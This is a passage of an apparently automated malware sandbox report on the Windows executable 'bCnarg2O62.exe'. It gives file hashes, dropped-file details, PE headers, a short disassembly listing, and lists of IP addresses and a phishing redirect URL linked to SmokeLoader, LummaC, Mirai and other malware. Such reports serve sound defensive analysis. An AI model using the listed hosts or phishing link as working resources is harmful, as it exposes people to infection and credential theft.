  • 211.237.8.97
  na.elf | malicious | Gafgyt
  • 27.255.85.30
  na.elf | malicious | Gafgyt
  • 27.255.85.35
  xd.arm.elf | malicious | Mirai
  • 165.132.246.42
  SOA SIL TL382920.exe | malicious | FormBook
  • 121.254.178.239
  UV2uLdRZix.exe | malicious | SmokeLoader
  • 211.181.24.133
  WhiteDefenderSetup64_20201118.exe | malicious | GuLoader
  • 211.171.245.2
SURFAIRWIRELESS-IN-01US
  BzLGqYKy7o.exe | malicious | SmokeLoader
  • 23.145.40.164
  UV2uLdRZix.exe | malicious | SmokeLoader
  • 23.145.40.164
  LKpIHL2abO.exe | malicious | SmokeLoader
  • 23.145.40.164
  wu5C20dPdy.exe | malicious | SmokeLoader
  • 23.145.40.164
  HaPJ2rPP6w.exe | malicious | SmokeLoader
  • 23.145.40.164
  c7v62g0YpB.exe | malicious | SmokeLoader
  • 23.145.40.162
  9VgIkx4su0.exe | malicious | SmokeLoader
  • 23.145.40.162
  veEGy9FijY.exe | malicious | SmokeLoader
  • 23.145.40.162
  v173TV3V11.exe | malicious | SmokeLoader
  • 23.145.40.162
  0k3ibTiMjy.exe | malicious | SmokeLoader
  • 23.145.40.162
BIHNETBIHNETAutonomusSystemBA
  UV2uLdRZix.exe | malicious | SmokeLoader
  • 185.12.79.25
  veEGy9FijY.exe | malicious | SmokeLoader
  • 109.175.29.39
  http://iss.fmpvs.gov.ba/Home/ChangeCulture?lang=hr&returnUrl=https://aaqkada0nzi2n2jhlthmzditndjinc1hz.hanskiin7.com/782340117681873687911955xbixgen-pgx-783419043035-ifxyeonkim-isxskyline-holt.comsf-1sf_rand() | malicious | HTMLPhisher
  • 109.175.10.156
  Cjmw6m68OV.exe | malicious | SmokeLoader
  • 109.175.29.39
  O9M84hUenb.elf | malicious | Mirai, Okiru
  • 92.36.229.158
  h8jGj6Qe78.exe | malicious | CryptOne, SmokeLoader, Stealc, Vidar
  • 92.36.226.66
  82HD7ZgYPA.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
  • 109.175.29.39
  fEz10JQnRZ.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
  • 92.36.226.66
  D9pL02CCa3.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
  • 92.36.226.66
  P61q5FVlmo.exe | malicious | LummaC, Go Injector, SmokeLoader
  • 92.36.226.66
SURFAIRWIRELESS-IN-01US
  BzLGqYKy7o.exe | malicious | SmokeLoader
  • 23.145.40.164
  UV2uLdRZix.exe | malicious | SmokeLoader
                                                                                                      • 23.145.40.164
                                                                                                      LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
Match                                 Associated Sample Name / URL                      SHA 256   Detection   Threat Name              Context
Match: 72a589da586844d7f0818ce684948eea
  BzLGqYKy7o.exe                                   malicious   SmokeLoader              • 23.145.40.164
  UV2uLdRZix.exe                                   malicious   SmokeLoader              • 23.145.40.164
  LKpIHL2abO.exe                                   malicious   SmokeLoader              • 23.145.40.164
  wu5C20dPdy.exe                                   malicious   SmokeLoader              • 23.145.40.164
  HaPJ2rPP6w.exe                                   malicious   SmokeLoader              • 23.145.40.164
  c7v62g0YpB.exe                                   malicious   SmokeLoader              • 23.145.40.164
  9VgIkx4su0.exe                                   malicious   SmokeLoader              • 23.145.40.164
  veEGy9FijY.exe                                   malicious   SmokeLoader              • 23.145.40.164
  v173TV3V11.exe                                   malicious   SmokeLoader              • 23.145.40.164
  0k3ibTiMjy.exe                                   malicious   SmokeLoader              • 23.145.40.164
Match: a0e9f5d64349fb13191bc781f81f42e1
  9Y6R8fs0wd.exe                                   malicious   LummaC                   • 23.145.40.168
  file.exe                                         malicious   LummaC                   • 23.145.40.168
  PFW1cgN8EK.exe                                   malicious   LummaC                   • 23.145.40.168
  file.exe                                         malicious   LummaC                   • 23.145.40.168
  SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe  malicious   LummaC                   • 23.145.40.168
  utmggBCMML.exe                                   malicious   LummaC                   • 23.145.40.168
  lihZ6gUU7V.exe                                   malicious   LummaC, Stealc, Vidar    • 23.145.40.168
  Bn7LPdQA1s.exe                                   malicious   LummaC, Vidar            • 23.145.40.168
  file.exe                                         malicious   LummaC                   • 23.145.40.168
  SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe  malicious   LummaC                   • 23.145.40.168
No context
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):453632
                                                                                                      Entropy (8bit):6.3528472110057015
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:rBS3kQBgyTmD60mDGMiH64vt3ro87JKn6+hNtzRUpy6BbO42Tn:YUQBgyXGMslJKnv2NO4O
                                                                                                      MD5:02F50094664F74B387AC57B1DE8679AF
                                                                                                      SHA1:E4DC28C4D8FD6C9010CA95B978133B46CAC5148E
                                                                                                      SHA-256:A9276BC533A2BB42308613EAF590FD97F662E81A4C4F1A1BE43709AE3B923432
                                                                                                      SHA-512:DE298772E5232A547BF7DDCDC45EF9A84BAF46911994D80E93F9F75CD00EE1EA474892AF98C82FD96E343F7A858A3627C39E22E2D17496C13A81950B86F72895
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;..B;..B;..BT.bB#..BT.WB...BT.VBW..B2.oB<..B;..B...BT.SB:..BT.fB:..BT.aB:..BRich;..B........................PE..L....cd.............................;............@..................................o..........................................P...................................0...............................h...@............................................text............................... ..`.rdata..............................@..@.data............`..................@....xexolu.............................@..@.naxurew............................@..@.havi...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):78336
                                                                                                      Entropy (8bit):6.394001797252911
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:WPQkadQWo2lXlxiK/0PJMQ2VGhm9EGFDe8MRDiNfYg9TQRkAuHi5yvaIoFVr1VML:NBfdSKvVwDEhAuBhoL/MnJ0iXD46w0
                                                                                                      MD5:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                      SHA1:BA7888FFDB978851F38C4CAC82D58D8CD9A6F077
                                                                                                      SHA-256:B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
                                                                                                      SHA-512:938CE106217E9CE98F104AF0913054070C2CC5791DFAA9902540CAEF923579B8DE0AF0ED720753BC40ADC75D7E286ACCDE7198315805331F25BE3F312C23F0BC
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d......f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text...x........................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):98304
                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                      Category:dropped
                                                                                                      Size (bytes):28672
                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106496
                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49152
                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):114688
                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):453632
                                                                                                      Entropy (8bit):6.34706850547879
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:dBc5/Qqguk5r/EaOKIhfzrIqku/a5J0gToyxw7coy6BbO42Tn:MBQqgoampv1/GJ0gThx8NO4O
                                                                                                      MD5:FA949A7589DC71EA006EB10AD025618A
                                                                                                      SHA1:3525508CC8B83CDEC2BDE0BF0CBDC7CDAB62C383
                                                                                                      SHA-256:FFF79A1E96FFCAC77B3EB7BC01706BFECE7499AB8972B28A732DFA2AA09994EE
                                                                                                      SHA-512:40734414F0D40431625D1C79F7FC043458DE0F73B59764239041F6A7AC959A6E11869F45A334FEC45F37267BF9C2FF2CA4ACC23DB9C5EAC0E70E9413307DB136
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):290443
                                                                                                      Entropy (8bit):7.999354805405584
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:DK8qz437ZHZt5G0/3tBM4tuG6LfimzeXLhoNx2HFOJGgFQSU031/Hp:uLc37Z5bG01BR4h6mzILhoNclO4j0l/J
                                                                                                      MD5:F8A515527C7555F64CBECC59E38CC8EE
                                                                                                      SHA1:A379401E41B9089D6AB10899491DA3119C5CD5DB
                                                                                                      SHA-256:77226CD69B16B6012035EBE839310D51F09C54B7F7D3A24BF48405CDC30B77F1
                                                                                                      SHA-512:354CFF85F0A1C604EC28500A4D6E709E7FEE30DBB0DC17E23D4EE83243AF63AEFEDF464727026EF6CECC0DDA4E2035BB510AE40F45CFD9448CB29AC40518E9C1
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):453632
                                                                                                      Entropy (8bit):6.3528472110057015
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:rBS3kQBgyTmD60mDGMiH64vt3ro87JKn6+hNtzRUpy6BbO42Tn:YUQBgyXGMslJKnv2NO4O
                                                                                                      MD5:02F50094664F74B387AC57B1DE8679AF
                                                                                                      SHA1:E4DC28C4D8FD6C9010CA95B978133B46CAC5148E
                                                                                                      SHA-256:A9276BC533A2BB42308613EAF590FD97F662E81A4C4F1A1BE43709AE3B923432
                                                                                                      SHA-512:DE298772E5232A547BF7DDCDC45EF9A84BAF46911994D80E93F9F75CD00EE1EA474892AF98C82FD96E343F7A858A3627C39E22E2D17496C13A81950B86F72895
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.34706850547879
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:bCnarg2O62.exe
                                                                                                      File size:453'632 bytes
                                                                                                      MD5:fa949a7589dc71ea006eb10ad025618a
                                                                                                      SHA1:3525508cc8b83cdec2bde0bf0cbdc7cdab62c383
                                                                                                      SHA256:fff79a1e96ffcac77b3eb7bc01706bfece7499ab8972b28a732dfa2aa09994ee
                                                                                                      SHA512:40734414f0d40431625d1c79f7fc043458de0f73b59764239041f6a7ac959a6e11869f45a334fec45f37267bf9c2ff2ca4acc23db9c5eac0e70e9413307db136
                                                                                                      SSDEEP:6144:dBc5/Qqguk5r/EaOKIhfzrIqku/a5J0gToyxw7coy6BbO42Tn:MBQqgoampv1/GJ0gThx8NO4O
                                                                                                      TLSH:3CA4C00252D9FEA0F5E64A339D1EFAF8A52DFC51DE586757325C2B1F1B702A1C222720
                                                                                                      Icon Hash:55255145494d610d
                                                                                                      Entrypoint:0x403bb9
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x65C7B3C1 [Sat Feb 10 17:34:57 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:1
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:1
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:1
                                                                                                      Import Hash:e40ec87d26b2fdb6278430b22f5c1df6
                                                                                                      Instruction
                                                                                                      call 00007FA8E0F2E149h
                                                                                                      jmp 00007FA8E0F2B09Eh
                                                                                                      push dword ptr [00451258h]
                                                                                                      call dword ptr [0040F10Ch]
                                                                                                      test eax, eax
                                                                                                      je 00007FA8E0F2B214h
                                                                                                      call eax
                                                                                                      push 00000019h
                                                                                                      call 00007FA8E0F2DA2Bh
                                                                                                      push 00000001h
                                                                                                      push 00000000h
                                                                                                      call 00007FA8E0F2A9D0h
                                                                                                      add esp, 0Ch
                                                                                                      jmp 00007FA8E0F2A995h
                                                                                                      mov edi, edi
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 20h
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      push 00000008h
                                                                                                      pop ecx
                                                                                                      mov esi, 0040F3B0h
                                                                                                      lea edi, dword ptr [ebp-20h]
                                                                                                      rep movsd
                                                                                                      mov dword ptr [ebp-08h], eax
                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                      pop edi
                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                      pop esi
                                                                                                      test eax, eax
                                                                                                      je 00007FA8E0F2B21Eh
                                                                                                      test byte ptr [eax], 00000008h
                                                                                                      je 00007FA8E0F2B219h
                                                                                                      mov dword ptr [ebp-0Ch], 01994000h
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      push eax
                                                                                                      push dword ptr [ebp-10h]
                                                                                                      push dword ptr [ebp-1Ch]
                                                                                                      push dword ptr [ebp-20h]
call dword ptr [0040F140h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
Programming Language:
• [ASM] VS2010 build 30319
• [C++] VS2010 build 30319
• [ C ] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729
• [RES] VS2010 build 30319
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
--- | --- | --- | ---
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x49b20 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x1f100 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x49b70 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x490b0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x1e0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
--- | --- | --- | --- | --- | --- | --- | --- | --- | ---
.text | 0x1000 | 0xd49d | 0xd600 | 49618baca108ff28b4ba0a6755ccbb34 | False | 0.6013799649532711 | data | 6.6672590284458435 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xf000 | 0x3b5f8 | 0x3b600 | 5dc072fda94cb2cc79ac90b7d780b362 | False | 0.7532483552631579 | data | 6.877195715683228 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4b000 | 0x11cc0 | 0x6000 | 971d14af5ed905b6c288d4e05e9f40d8 | False | 0.08402506510416667 | data | 1.0916502474597252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.siy | 0x5d000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fitecos | 0x5e000 | 0xd6 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.darulet | 0x5f000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x1f100 | 0x1f200 | d8fc0635499f120e8c013fdaf1aa57c3 | False | 0.4249027359437751 | data | 5.013871580597741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
--- | --- | --- | --- | --- | --- | ---
RT_CURSOR | 0x79b78 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706
RT_CURSOR | 0x79ea8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316
RT_CURSOR | 0x7a000 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968
RT_CURSOR | 0x7aea8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196
RT_CURSOR | 0x7b750 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579
RT_CURSOR | 0x7bce8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755
RT_CURSOR | 0x7cb90 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018
RT_CURSOR | 0x7d438 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751
